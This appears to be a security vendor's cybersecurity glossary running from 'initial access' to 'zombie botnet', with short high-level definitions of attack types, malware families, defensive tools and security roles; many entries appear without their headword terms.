Initial access refers to the adversary’s first successful entry point into a target network or system. It represents the critical foothold that enables attackers to establish a presence, often through tactics like phishing, exploiting vulnerabilities, or leveraging stolen credentials.

An initialization vector (IV) is a random or pseudorandom value used in encryption algorithms to ensure that identical plaintext inputs yield unique ciphertext outputs, even when encrypted with the same key.

An injection attack is a type of cyberattack where a malicious actor inserts (or "injects") unauthorized code into a vulnerable computer program or system. This malicious code is then processed by the application, tricking it into executing unintended commands or accessing data without proper authorization.

An insider threat is a cybersecurity risk that originates from within an organization, typically involving current or former employees, contractors, or business partners who have authorized access to company systems and data, but misuse that access either intentionally or unintentionally.

In cybersecurity, integrations describe the capability of different computers and software systems to work together and exchange data.

Interactive login is a user authentication method where someone directly communicates with a computer system through an interface—like typing a username and password on a login screen—to gain access to that system.

Intrusion Detection System (IDS) is a security tool that monitors network traffic or system activities for suspicious behavior and alerts administrators when potential threats are detected.

IDS is a security tool that detects the presence of cyber threats and notifies administrators. HIDS (Host-based Intrusion Detection) and NIDS (Network-based Intrusion Detection) can also be used, which are IDS tools used specifically for either the endpoints (host) or the network.

IoT cybersecurity is a field focused on defending everything from that smart lock on your front door to industrial robots and city traffic lights. It covers device protection, network security, data protection, and continuous monitoring.

A unique identifier for a device connected to the internet, represented as a string of numbers and characters.

Intrusion Prevention System is a form of network security that can identify malicious activity, collect information about said activity, report it and attempt to block or stop it. An IPS works by actively scanning and analyzing network traffic for malicious activities and known attack patterns. Similar to an IDS, intrusion prevention systems are designed to warn of suspicious activity, but the key difference is that they can also take automated action and respond to active threats based on a predetermined set of rules.

International Revenue Share Fraud (IRSF) involves bad threat actors exploiting telecom systems to artificially generate international call traffic toward premium-rate numbers. These premium numbers often belong to overseas carriers or shell entities owned by fraudsters.

Identity Threat Detection and Response (ITDR) is a cybersecurity framework that helps protect user identities and systems from cyberattacks.

A cybersecurity discipline that focuses on helping organizations and individuals protect their identity infrastructure and assist with remediation related to identity-centric attacks.

JIT refers to enabling specific privileges only when needed and disabling it when no longer required. This significantly reduces the window of vulnerability and minimizes the risk of unauthorized access or misuse of elevated privileges.

Using cryptography, Kerberos is an authentication protocol that verifies the identity of users and hosts.

A keylogger is a software that an attacker uses to record keystrokes remotely on a physical keyboard and capture passwords or other critical information.

Keystroke logging (or keylogging) is a method of tracking and recording every keystroke you make on a keyboard. Keyloggers can monitor anything you type, from passwords and emails to credit card numbers and private messages.

LaaS (Logging as a Service) is cloud-based solution that centralizes log management from applications, servers, and network devices, providing organizations with scalable monitoring and analysis capabilities without maintaining on-premises infrastructure.

A Local Area Network (LAN) is a network of connected devices within a limited geographic area, such as a home, office building, or school campus.

Lateral movement in cybersecurity refers to an attacker’s ability to move across a network after gaining initial access. Attackers use lateral movement to gain deeper access, steal valuable data, escalate privileges, or even set the stage for a massive ransomware attack.

Layer 7 protocols enable applications to communicate over networks. When you type a URL into your browser, Layer 7 protocols like HTTP or HTTPS spring into action.

Least privilege access is the principle of giving users the minimum access necessary to perform their job functions. It is a security measurement that limits access to sensitive data to only the people who truly need it for their work.

A log format is a structured way to organize log data so it’s both human-readable and machine-friendly.

Log parsing means taking those big (often ugly) log files and splitting them into neat chunks of data. Imagine a log file as dozens of receipts tossed in a bag. Log parsing is what sorts them by date, item, store, and total, so you can find exactly what you need.

Log retention is the practice of storing and managing log files for a specified period to meet security, compliance, and operational requirements. It involves determining what logs to keep, how long to store them, and where to house this critical data.

Log rotation is an automated process used to manage log file sizes by systematically renaming old files and creating new ones.

Log streaming is the real-time process of continuously capturing and transmitting log data from applications and systems to external monitoring, analytics, or storage platforms for immediate analysis and alerting.

LOLBins stands for Living Off the Land Binaries. These are legitimate, preinstalled programs or tools that come with the operating system (like Windows or MacOS).  Attackers exploit these legitimate tools for malicious purposes instead of introducing new, suspicious files.

LTE, short for Long Term Evolution, is a fourth-generation (4G) wireless communication standard established by the 3rd Generation Partnership Project (3GPP).

Living Off the Land (LOTL) attacks are a type of cyberattack where threat actors use legitimate, trusted tools and software already present on a target system to carry out malicious activities. Attackers exploit built-in system utilities, administrative tools, and legitimate applications to avoid detection and achieve their objectives.

Low-code platform security is the practice of keeping your low-code apps safe from unauthorized access, data breaches, and configuration slip-ups, which includes securing development environments, sticking to pre-vetted components, using built-in security features, and double-checking that your configurations and access controls are correct.

Machine learning lets computers learn from data and make decisions or predictions without being programmed to do so.

A magic number is a specific sequence of bytes, found at the beginning of a file, that acts as its unique fingerprint. These numbers help computers and software identify the type of file—even when it doesn’t have a file extension, or the extension has been tampered with.

Malspam is a short for "malicious spam," this refers to unsolicited emails used to deliver malware through infected attachments or links to malicious websites.

Malspam is a spam email that delivers malware, often through malicious attachments (like infected documents or executables) or links that, when clicked, download malware onto the recipient's device.

Malvertising is a cyberattack method where criminals inject malicious code into legitimate online advertisements to distribute malware or redirect users to dangerous websites.

Malware is malicious software designed to harm a computer, network, or server. Malware includes things like viruses, worms, Trojans, ransomware, spyware, or adware.

Malware analysis is the process of understanding the behavior and purpose of suspicious files or URLs to help detect and mitigate potential threats.

A malware analyst studies suspicious files and software to understand how malware works and how it can be stopped. Their insights help cybersecurity teams detect, investigate, and defend against cyberattacks.

A malware packer is a tool that compresses, encrypts, or obfuscates malicious software to evade detection by antivirus programs and security tools. Think of it as digital camouflage that cybercriminals use to hide their malicious code from cybersecurity defenses.

This type of cyber attack involves a threat actor putting themselves in the middle of two parties, normally a user and an application, to intercept their communications or data exchanges to use for malicious purposes.

Managed Detection and Response (MDR) has emerged as a critical service that combines advanced technology with human expertise to safeguard businesses against cyberattacks.

A cybersecurity service combining technology and human expertise to perform threat hunting, monitoring, and response. MDR technology collects and analyzes information from logs, events, networks, endpoints and user behavior—which is then paired with a team of experts who can take over to validate incidents, escalate critical events and provide recommended response actions so threats can be quickly remediated. MDR services are managed or co-managed by an outside partner to provide value to organizations that either have limited resources or lack the expertise to keep eyes on all of their potential attack surfaces.

Managed IT services are services managed outside an organization by external vendors, where these service providers give businesses the expertise and resources to manage their IT infrastructure and operations. This can include tasks like network management, cybersecurity, data backup and recovery, and software updates, freeing up internal IT staff to focus on strategic initiatives.

Managed Security Service Providers (MSSP) are third-party organizations providing outsourced security services.

Mean Time to Respond (MTTR) is the average time it takes a security team to respond to and resolve a cybersecurity incident from the moment they receive notification.

A media server is a dedicated computer system or software application that stores, processes, and delivers multimedia content such as videos, audio, and images to other devices across a network. Simply put, a media server acts as the central library and distribution point for digital media within organizations or homes.

Mimikatz is a tool designed to extract sensitive authentication credentials from Windows systems’ memory. Developed by Benjamin Delpy, it started as a proof-of-concept to demonstrate vulnerabilities in Microsoft's authentication protocols but quickly became an indispensable utility in the cybersecurity world.

Mobile Device Management (MDM) is cybersecurity software that helps organizations secure, monitor, and manage employees' mobile devices—like smartphones, tablets, and laptops—that connect to company networks.

An authentication method that requires users to provide two or more verification factors before granting access or signing in. These factors can include something only the user would know (e.g., password/PIN), something only the user would have (e.g., token) or something only the user is (e.g., biometric). MFA then uses these factors to confirm the identity of someone who is requesting access to an application, website or another resource. MFA is a key factor in account takeover defense.

Multihoming is a network configuration where a device or network connects to multiple internet service providers (ISPs) or networks simultaneously.

NAT rules are configuration settings that define how Network Address Translation (NAT) should modify IP addresses as network traffic passes through a firewall or router. 

NIST is a US agency advancing measurement science, standards, and technology to enhance economic security.

Endpoint firewalls that enable total control over network traffic using dynamic ACLs.

An integrated network security solution designed to detect threats and suspicious behavior on an organization's networks using non-signature-based techniques (such as machine learning and other analytical techniques). NDR solutions track north/south network traffic that crosses the perimeter, as well as east/west lateral traffic to establish a baseline of normal behavior and raise alerts when anomalous behavior is detected. NDR solutions give security teams real-time visibility and awareness over network traffic and the ability to respond to perceived threats.

A network redirector is software that helps your computer access files, printers, and other resources on remote network systems. It acts as a bridge between your local device and shared resources on other machines across a network.

Network security engineers design, implement, and maintain the security infrastructure that protects organizational networks from cyber threats.

Network segmentation is the practice of dividing a computer network into separate segments or zones to limit access to sensitive data and reduce attack risks.

Next-Generation Antivirus (NGAV) is an expanded version of antivirus that goes beyond performing signature-based detection—typically by incorporating some type of advanced technology—to prevent a wider range of attacks. Unlike traditional AV, next-generation AV focuses on events (files, processes, applications, network connections, etc.) to help identify malicious intent or activity. NGAV has emerged in recent years to address the proliferation of new types of malware and viruses that can easily bypass traditional AV.

NFS (Network File System) is a distributed file sharing protocol that allows computers to access files and directories on remote servers as if they were stored locally. Originally developed by Sun Microsystems in 1984, NFS enables seamless file sharing across networks, making it a fundamental technology in modern IT environments.

NGFW IPS combines the features of a Next-Generation Firewall (NGFW) and an Intrusion Prevention System (IPS) to enhance cybersecurity. It blocks unauthorized access, monitors network traffic, and actively prevents attacks in real-time.This integrated approach allows organizations to protect their networks more effectively by merging robust firewall capabilities with advanced threat detection. NGFW IPS adapts to new and evolving cyber threats, safeguarding businesses from malware, ransomware, and zero-day vulnerabilities.

NTLM (New Technology LAN Manager), developed by Microsoft, is a suite of security protocols designed to authenticate users on networks running Windows operating systems.

Object Linking and Embedding (OLE) is a Microsoft technology that simplifies how programs work together. At its core, OLE enables the integration content like text, images, charts, and even spreadsheets from different applications into a single document.

Observability refers to the ability to infer the internal state of a system by examining its external outputs, like metrics, logs, and traces.

On-premises is a physical infrastructural setup deployed, running, and maintained within the confines of an organization typically in a datacenter or COLO (Colocation Facility).

A one-time password (OTP) is a temporary code, randomly generated by an algorithm, that you use only once making it nearly impossible for hackers to guess or reuse later.

Open banking lets you securely share your financial data with approved third-party apps and services.

OpenID Connect (OIDC) is an identity layer built on top of the OAuth 2.0 protocol that allows users to use an existing account from an identity provider to sign into various web applications securely.

OSINT refers to the gathering and analysis of publicly available data for intelligence purposes.

OpenSSL is a free, open-source toolkit that provides encryption for securing communications across computer networks.

OWASP is an internet community focused on understanding web technologies and exploitations, also known as the OWASP Top 10.

Over-the-air (OTA) technology refers to the wireless delivery of software updates, configurations, and data to connected devices without requiring physical access or manual intervention. This technology enables remote updates to everything from smartphones to smart cars, using cellular, Wi-Fi, or other wireless networks.

PCAP is a network practice of intercepting data packets traveling over a network which a security team stores and analyzes.

A parser is a program that takes input data, often text, and transforms it into a structured format that a computer can understand and process. This transformation involves analyzing the input to determine its grammatical structure, a process known as parsing.

A password management tool is software that stores and protects confidential information like usernames and passwords for local applications and online services. A password manager will house a user’s passwords, as well as other information, in one convenient location with one master password. The information is encrypted and often requires multi-factor authentication to access.

Password security storage refers to the methods and technologies used to safely store user passwords in databases and systems, ensuring they remain protected even if the storage system is compromised.

Password spraying is a type of brute force cyberattack where hackers use a few common passwords against many user accounts, rather than trying multiple passwords on a single account. This "low and slow" approach helps attackers avoid detection systems that typically lock accounts after multiple failed login attempts.

Passwordless security is exactly what it sounds like—a way to authenticate users without requiring them to enter a traditional password. Instead of typing in "Password123!" (please tell me you're not actually using that), users verify their identity through something they have (like their phone), something they are (like their fingerprint), or something they know that's not a static password.

The Payment Card Industry Data Security Standard (PCI DSS) is a globally recognized set of security protocols that protect credit card transactions from theft and fraud. It was established in 2004 and is maintained by the Payment Card Industry Security Standards Council (PCI SSC), which includes major financial brands like Visa, Mastercard, and American Express.

A penetration test is a security exercise where a security expert tries to find and exploit vulnerabilities in a computer system. Pen tests are different from vulnerability scans in that they involve an actual attempt to exploit vulnerabilities, while vulnerability scans simply report on possible vulnerable code, applications, configurations, or operating systems.

Persistence enables malware by letting the malware keep running—all while the attacker stays undetected.

A persistent foothold is an attacker mechanism to automatically re-trigger some malware (maybe a stub or even fully loaded malware) across potential interruptions like restarts or user logoffs.

Personally identifiable information (PII) refers to any data that can directly or indirectly identify an individual. 

Malicious attempts to trick users into revealing sensitive information through deceptive emails or links. Learn more about phishing through our guide, What is Phishing (and How Does It Affect Your Business)?

A physical security tester evaluates an organization's physical defenses by attempting to gain unauthorized access to buildings, facilities, and restricted areas. They identify vulnerabilities in locks, access controls, surveillance systems, and security procedures to help organizations strengthen their overall security posture.

Platform-as-a-Service (PaaS) is a complete cloud environment that includes everything developers need to build, run and manage applications.

A polymorphic virus is malware that modifies its code or appearance with each infection, while its harmful functionality remains the same. These changes make traditional, signature-based antivirus tools ineffective, as each new variant looks unique.

Post Office Protocol (POP) is a standard way for your email client (like Outlook or Thunderbird) to retrieve emails from a remote server to your computer. Most people are talking about POP3, the current version, which is still widely used today.

A Potentially Unwanted Application (PUA) is software that may not be malicious but can cause problems like slowing down your computer, displaying excessive ads, or collecting personal data without your consent. While not always outright dangerous, PUAs often come bundled with other downloads or sneak onto systems unnoticed.

The principle of least privilege is a cybersecurity approach that gives users, programs, and even devices only the access they absolutely need to do their job or function. No more, no less.

Privilege escalation refers to the act of gaining higher-level permissions or access rights within a system, often beyond what is legitimately authorized for a user or process.

A system or router that acts as a middleman between a user and the internet.

Punycode is a special encoding system that converts Unicode characters (used in scripts like Chinese, Cyrillic, and Arabic) into ASCII format so they can be processed by DNS.

The purple team marries the strengths of red and blue teams into a collaborative force built for modern cyber defense.

Very different from classical computing, quantum computing refers to advanced computing using quantum-mechanical phenomena.

Quantum cryptography is an advanced cybersecurity technique that uses the principles of quantum mechanics to secure data and communications.

A race condition occurs when the outcome of a program or process depends on the timing or sequence of multiple threads or processes that are accessing and modifying shared resources. This lack of proper synchronization creates unpredictable behavior, which can lead to security vulnerabilities, data inconsistencies, and system instability.

A rainbow table is a large, precomputed database that maps plaintext passwords to their hash values. They store chains of possible passwords and their hashes, giving attackers a shortcut to cracking hashes without the computational cost of guessing each password interactively.

A RAM scraper, or Random Access Memory scraper, is a type of malware designed to steal payment card data from a computer's memory before it gets encrypted. These tools are often used by cybercriminals to target point-of-sale (POS) systems, particularly in retail and hospitality settings.

Ransomware is malicious software that encrypts data and demands payment, usually in the form of cryptocurrency, for its release.

Ransomware recovery is the coordinated effort to restore and secure your systems after a ransomware attack. It begins with figuring out how far the ransomware has spread, where it came from, and what damage has been done. Once your team understands the full scope, you have to completely remove the ransomware itself. This usually involves deploying security tools to isolate and eliminate the malicious software from all affected devices and networks.

Recovery Point Objective (RPO) is the maximum amount of data an organization can afford to lose during an outage, measured in time. It helps determine how often backups need to be done to minimize data loss.

Recovery Time Objective (RTO) refers to the maximum acceptable amount of time that a digital system, application, or service can remain unavailable following a disruption. Measured in seconds, minutes, hours, or days, RTO represents the critical window in which operations must be restored to minimize losses and maintain business continuity.

A red team is a group of internal or external IT experts who simulate the actions of adversarial malicious attacks on a network as an exercise.

As the name implies, remote access refers to accessing network resources from a geographical distance through a network connection.

Remote administration tools (RATs) are software solutions that allow users to connect to and control computers or networks remotely.

Remote code execution (RCE) is a security flaw that allows threat actors to run commands or code on a target computer remotely.

Repacking in cybersecurity refers to the malicious practice of modifying legitimate mobile applications by inserting harmful code, then redistributing these tampered apps to unsuspecting users.

Reverse engineering is like solving a digital puzzle, where each piece of software holds secrets waiting to be unraveled. For cybersecurity professionals, reverse engineering is a powerful tool for understanding software vulnerabilities, analyzing malware, and fortifying digital defenses.

An RFC, or "Request for Comments," is a type of technical document published by folks who help set the rules of the internet, mainly the Internet Engineering Task Force (IETF).

A Risk and Compliance Specialist plays a vital role in helping businesses identify, manage, and minimize risks while ensuring they adhere to laws, regulations, and industry standards. These professionals protect organizations against legal issues, financial losses, and reputational damage by developing and implementing compliance programs and risk mitigation strategies.

A rogue access point (rogue AP) is any wireless access device, like a Wi-Fi router or hotspot, that connects to an organization’s network without permission from IT or network security administrator

Rogue Apps is a new Managed ITDR capability that enables Huntress to identify unsafe applications installed in a protected tenant. Rogue Apps represents Managed ITDR’s next step in wrecking hacker identity tradecraft. With this new capability, Huntress detects “Traitorware,” which are legitimate apps used badly that we detect by name, and “Stealthware,” which refers specifically to unknown apps that our algorithm marks as suspicious.

A rootkit is a type of malware that gives attackers hidden control over a computer system, allowing unauthorized access while staying concealed, making it one of the trickiest cyber threats to detect and remove.

Same-Origin Policy (SOP) is a fundamental web security mechanism that prevents a script loaded from one origin from interacting with resources from a different origin to protect user data.

Sandboxing is a cybersecurity technique used to test, observe, and analyze potentially harmful files or programs in a safe, isolated environment.

SASE, Secure Access Service Edge is a modern networking architecture that converges software-defined networking with comprehensive security functions into a single, cloud-native service.

A scam is a deceptive scheme or trick intended to cheat someone out of money, sensitive information, or valuable property.

Scareware is a form of malware that uses fear to deceive users into making harmful decisions. It typically masquerades as fake antivirus software or system alerts, claiming that your device is under immediate threat to pressure you into purchasing bogus software, clicking on harmful links, or downloading actual malware.

A script kiddie is someone who uses pre-made tools or scripts (created by others) to run cyberattacks.

A security analyst is a cybersecurity professional focused on identifying, preventing, and responding to cyber threats. They safeguard systems, networks, and sensitive organizational data by employing a mix of monitoring tools, policies, and incident response techniques.

Security by Obscurity is a controversial security practice that relies on keeping the inner workings, flaws, or implementation details of a system hidden as the primary means of protection.

A security data lake is a centralized repository designed to ingest, store, and analyze massive amounts of security data from diverse sources within an organization.

Security dependencies are the links or relationships between components, processes, and entities within your company’s cybersecurity ecosystem.

A security director oversees all security operations within an organization, managing both physical and cybersecurity measures to protect people, assets, and data. They develop security policies, lead security teams, and serve as strategic advisors to executive leadership on risk management and threat mitigation.

A security email is a message designed or processed to protect its content, the email sender, and the recipient from cyber threats such as phishing, malware, or unauthorized access.

Security issues are potential vulnerabilities or weaknesses in systems, networks, or processes that cybercriminals can exploit to gain unauthorized access, steal data, or disrupt operations. These issues represent gaps in an organization's defense that, if left unaddressed, can lead to devastating consequences.

A security misconfiguration is a vulnerability that happens when the settings on your applications, systems, or cloud services aren’t properly secured, creating gaps that attackers can exploit.

A centralized unit that deals with security issues on an organizational and technical level. SOCs are typically staffed with a team of domain experts (either in-house or outsourced) who focus on preventing, detecting, analyzing and responding to cybersecurity incidents. A SOC acts as a central command post that continuously monitors an organization’s environments and toolsets and improves its security posture. Learn more about what the Huntress SOC brings to your tech stack.

A security operations report is a document that provides detailed insights into an organization’s security posture, ongoing threats, and the effectiveness of its defenses. Crafted by a Security Operations Center (SOC) team, it serves as a comprehensive log of cybersecurity activities and outcomes, offering both a current and historical view of an organization’s digital safety.

Security Orchestration is the process of bringing your security tools, teams, and workflows together so they work in sync, all to boost your defenses and knock out threats faster.

A collection of software solutions and tools that aggregate security intelligence and context from disparate systems, and applies machine intelligence to streamline (or even completely automate) the threat detection and response process. SOAR combines three software capabilities: the management of threats and vulnerabilities (orchestration), automating security operations (automation) and responding to security incidents (response). Due to its aggregation and automation capabilities, SOAR solutions are often used by security operation centers (SOCs) to collect threat-related data from a range of sources and automate the responses to certain threats.

Security Posture is the overall strength and readiness of an organization's collective cybersecurity defenses, including its technical controls, policies, and incident response capabilities.

Cybersecurity threats often start with a proof of concept (PoC) before spiraling into something much worse. For most organizations and MSPs (managed service providers), knowing what a PoC is and how it works can give you a critical edge in staying protected. Because trust us, the gap between a PoC and a full-blown attack? It’s way smaller than you want it to be.

At its core, SOA is a modular design framework used to enable services to communicate over a network. It organizes software into loosely coupled, reusable components (think services like "payment processing" or "user authentication") that can be deployed and accessed independently.

A session is a time-limited conversation between two or more devices over the internet.

Session hijacking is an attack where a threat actor manipulates a session token to gain unauthorized access to information.

A typical SID looks like this: S-1-5-21-3632462615-3141105534-30830830-1115. Let's break down what each part means: S: Indicates this is a Security Identifier. 1: The revision level (current version is 1). 5: The identifier authority (5 = NT Authority). 21: Sub-authority indicating the domain identifier size. 3632462615-3141105534-30830830: The domain or local computer identifier. 1115: The Relative Identifier (RID) that pinpoints the specific user or group. Windows uses these components to ensure each SID is globally unique and can never be duplicated.

SIEM stands for security, information, and event management. SIEM is a software solution that aggregates and analyzes activity from many different sources across an entire IT infrastructure. A SIEM gathers immense amounts of data from an entire networked environment, then consolidates and makes that data human accessible. With the data categorized and laid out, SIEM solutions are often used by security operation centers (SOCs) to streamline visibility across an environment, centralize data for security monitoring and investigate logs and events for incident response.

Single-Factor Authentication (SFA) a basic security process that requires only one category of credential—typically a password or PIN—to verify a user's identity, making it more vulnerable to compromise than multi-factor methods.

A SIP Gateway is a technology that connects traditional telephony systems, like analog phones, with modern Voice over Internet Protocol (VoIP) networks. This allows organizations to integrate older equipment with internet-based communication services seamlessly.

A SIP proxy is a server that routes Session Initiation Protocol (SIP) messages between devices to establish, manage, and terminate communication sessions, such as voice calls, video conferences, and messaging, over IP networks.

A skimmer is a small device that criminals attach to legitimate card readers. It’s designed to record information from the magnetic stripe of your credit or debit card when you use it to pay or withdraw cash. 

Smishing, short for SMS phishing, is a type of cyberattack where threat actors trick you into giving up personal information or downloading malware through text messages.

SNMP, Simple Network Management Protocol is a standard protocol used for monitoring and managing devices on an IP network, though it requires careful configuration to avoid being exploited by attackers.

Snort rules are written instructions that tell the Snort Intrusion Detection System (IDS) what network activity to watch for and how to respond. These rules help detect suspicious or malicious traffic moving through your network, from malware downloads to port scans.

SOAP (Simple Object Access Protocol) is a messaging protocol that enables different systems to communicate securely over a network, especially the internet. It’s often used for sending and receiving data between applications, regardless of the technology or programming language they use.

A SOC analyst is a cybersecurity professional embedded within a SOC. They’re responsible for monitoring, detecting, and responding to potential threats within networks. 

Software security means designing, developing, and maintaining software so that it resists attacks or accidental failures. Its main goal is to keep software safe from being misused, altered, or broken—even when hackers or mistakes try to take it down.

SaaS is a software licensing model which allows access to software on a subscription basis using external servers.

A switched port analyzer (SPAN) is a dedicated port on a switch that sends a mirrored copy of network traffic from within the core switch or firewall to a destination. People use it to review network traffic using software like Wireshark.

Spear phishing is a targeted phishing attack using researched information to deceive specific individuals.

A cyberattack that injects malicious SQL code into an application to view or modify a database.

SSH, or Secure Shell, is a cryptographic protocol enabling secure communication between two systems over an unsecured network.

SSL (Secure Sockets Layer) is an encryption-based security protocol designed to protect internet communications to ensure that data shared between a user and a website is scrambled into an unreadable format for security.

SSL termination is the process of decrypting encrypted traffic at a network endpoint—like a load balancer or reverse proxy—before passing it to web servers.

An SSL VPN (Secure Sockets Layer Virtual Private Network) is a type of VPN that allows users to access a network securely through a web browser. It encrypts data, ensuring safe communication between the user and the network.

A stack trace is a detailed report that shows the sequence of function or method calls a program made leading up to an error or crash. This information helps pinpoint exactly where things went wrong in the code.

Unknown and rare applications with broad permissions that provide attackers with a backdoor into the tenant environment. These globally unique, single, or multi-tenanted malicious applications often fly under the radar of traditional security tools and can be leveraged for persistent access, phishing campaigns, and data theft.

Steganography is the practice of concealing information within another file, message, or medium that appears normal. This technique ensures that the hidden information's very existence is kept secret.

Structured logging records data in a standardized, machine-readable format, with key-value pairs or JSON (JavaScript Object Notation) being the most common setup.

Suricata is an open source detection engine that acts as an IDS (Intrusion Detection System).

Symmetric Encryption Algorithms is a cryptographic methods that use a single shared key for both the encryption and decryption of data, offering high speed for processing large volumes of information.

Syslog is a simple protocol that computer systems use to send event data logs to a central location for storage.

System development follows a structured lifecycle with distinct phases from planning to maintenance. Security considerations must be integrated at every stage to prevent vulnerabilities. The process involves multiple stakeholders including developers, security teams, and end users. Different methodologies exist, but all emphasize planning, testing, and documentation. Proper system development reduces cybersecurity risks and ensures compliance with regulations.

TCP/IP (Transmission Control Protocol and Internet Protocol) is a set of standardized rules that allow devices to connect and exchange data on a network (aka, it’s what powers the internet). 

A text bomb, also called SMS bomb, is a malicious tactic where an attacker or automated system sends massive number of unsolicited texts to a phone in rapid succession.

A threat actor is any individual, group, or entity that intentionally carries out actions that could cause harm to digital systems, data, or networks. In cybersecurity, threat actors are responsible for orchestrating cyberattacks—for profit, espionage, disruption, or to push ideological agendas.

Proactively searching across various telemetry for threats is referred to as threat hunting. This involves analyzing system logs, network traffic, and other data sources to uncover malicious activity that may have evaded existing security controls.

Threat intelligence is understanding what adversaries are doing, how they’re doing it, finding ways that you can implement the data to detect and disrupt them, and areas where you can gain advantages over attackers.

A threat intelligence analyst is a cybersecurity professional who collects, analyzes, and interprets raw data about current and emerging cyber threats.

A threat intelligence feed is a continuous stream of data about potential cyber threats. These feeds delivers up-to-the-minute data on known malicious activity to help organizations spot, share, and stay ahead of new and emerging attacks in real time.

TLS (Transport Layer Security) encryption is a technology that secures data while it’s being transmitted online, ensuring it’s safe from eavesdropping or tampering. It’s the backbone of secure communication on the internet, protecting information like passwords, payment data, and emails.

Legitimate applications often abused by attackers, such as eM Client, PerfectData Software, and Newsletter Software Supermailer. These applications may appear harmless but can be exploited for malicious activities like phishing, data exfiltration, and financial fraud.

A database stored locally on macOS computers designed to restrict software from accessing sensitive user information. Commonly used for applying Full Disk Access for software.

TrickBot originally emerged in 2016 as a banking trojan designed to steal financial credentials. Over time, it has evolved into a modular malware framework, widely used as a loader for ransomware and various criminal payloads. Cybercriminals quickly recognized TrickBot’s adaptability and capability, which made it a centerpiece in many malware-as-a-service (MaaS) operations.

A Trojan Bitcoin miner is a piece of malware that hijacks your computer’s resources to mine cryptocurrency without your knowledge or consent.

TTPs, or Tactics, Techniques, and Procedures, refer to the methods attackers use to plan, execute, and achieve their objectives in a cyberattack.

In cybersecurity, a tunnel is a secure, encrypted connection that lets data be transmitted privately over an untrusted network.

Typosquatting, also referred to as URL hijacking or domain spoofing, is a form of cyberattack where threat actors register slightly misspelled versions of legitimate domain names to trick users into visiting their malicious sites. These fake sites appear similar to the originals and often imitate the design and functionality of trusted brands.

Unified Extensible Firmware Interface (UEFI) is a modern replacement for the legacy BIOS (Basic Input/Output System) that handles the critical first steps of your computer's boot process.

Unauthorized or unwanted access occurs when a person or entity gains access without permission to connect to or use a system and perform malicious actions.

Unified Audit refers to the process of consolidating audit logs from different sources into a single system for centralized monitoring, analysis, and reporting. This approach is integral in cybersecurity, allowing organizations to improve their visibility over user activities and system security across various platforms.

URL spoofing is a tactic used by attackers to trick you into thinking a fake website or link is legitimate. It often involves creating a lookalike URL designed to steal personal data or spread malware.

A user agent is a piece of software that acts on your behalf to communicate with websites.

UEBA is a cybersecurity solution that uses algorithms and machine learning to detect anomalies in the behavior of users as well as routers, servers and endpoints in a network.

A Virtual Local Area Network (VLAN) is a virtual partioning of one physical network into multiple, logical networks.

A virtual computer image that behaves like an actual computer, a virtual machine can run its own separate computing environment, typically inside of a server.

A VPN, or Virtual Private Network, is a service that creates a secure, encrypted connection between your device and the internet. It helps protect your online activity from prying eyes, ensuring your information stays private.

A computer virus is malicious software crafted to replicate, spread, and cause harm, such as slowing down devices, corrupting files, or stealing sensitive data. 

Vishing is short for voice phishing and involves fraudulent phone calls that trick a victim into giving sensitive data like login credentials, credit card numbers, or bank details.

A VoIP network is a system that uses the internet to transmit voice calls and related communications, rather than traditional phone lines. VoIP stands for Voice over Internet Protocol, which means voice data is sent and received using Internet protocols.

A vulnerability is a weakness in software or hardware that can be exploited by malicious actors. Examples include a flaw in software, a misconfiguration, or a human error.

A watering hole attack is a cyberattack where hackers compromise a legitimate and trusted website frequently visited by the intended target audience. The goal is to infect specific individuals or organizations with malware or gain unauthorized access to their networks.

In cybersecurity, weaponization uses non-harmful tools or documents maliciously to inflict harm.

Web Application Firewall (WAF) is a tool that helps protect web-based applications, mobile apps, and APIs from cyber attacks by filtering and monitoring HTTP traffic between them and the Internet.

A web server is a computer system or software that hosts websites and delivers web pages to users when requested. Think of it as the engine that powers the internet, making sure you can access your favorite cat videos, online shopping carts, or even this very article.

Website defacement is when someone gains unauthorized access to your website and swaps your pages or messages with their own. It’s digital graffiti, but the stakes are much higher for your business, reputation, and trust.

Website Logging is the systematic process of recording events and activities on a web server to help administrators monitor performance, troubleshoot issues, and detect security breaches.

A white team in cybersecurity serves as the oversight and coordination unit that ensures security testing activities remain ethical, legal, and aligned with organizational policies. They act as neutral referees who manage, document, and facilitate communication between various cybersecurity teams during security assessments and exercises.

XSS (cross-site scripting) is a code injection attack where malicious code is inserted into a legitimate website.

Yara rules define patterns using a specialized rule-writing language. When a file or process is analyzed, Yara compares it against these rules. If the file or process matches the criteria defined in a rule, it's flagged as potentially malicious.

A Zero Trust Architecture refers to the way network devices and services are structured to enable a Zero Trust security model.

ZTNA is an IT technology solution that requires all users to be authenticated, authorized, and continuously validated for security configuration and posture before being granted or keeping access to applications and data.

Zero Trust is a security concept requiring all users to be authenticated and authorized before granting access to applications and data.

Zero-day vulnerabilities are security vulnerabilities unknown to developers, which become exploited by attackers before developers can release a fix.

The Zeus trojan (also called Zbot) is a form of malware used by cybercriminals to steal sensitive information, mostly online banking credentials. It silently infects a computer, logs your keystrokes, and sends your private data back to attackers without you knowing.

A zip bomb, also known as a “decompression bomb” or “zip of death,” is a type of malicious archive file designed to overwhelm a system’s resources when decompressed. Unlike most malware, which corrupts or steals data, zip bombs create chaos by exhausting a system’s CPU, RAM, and storage capacity.

A zombie botnet is a network of internet-connected devices, such as computers, smartphones, or IoT devices, that have been infected with malware and are secretly controlled by hackers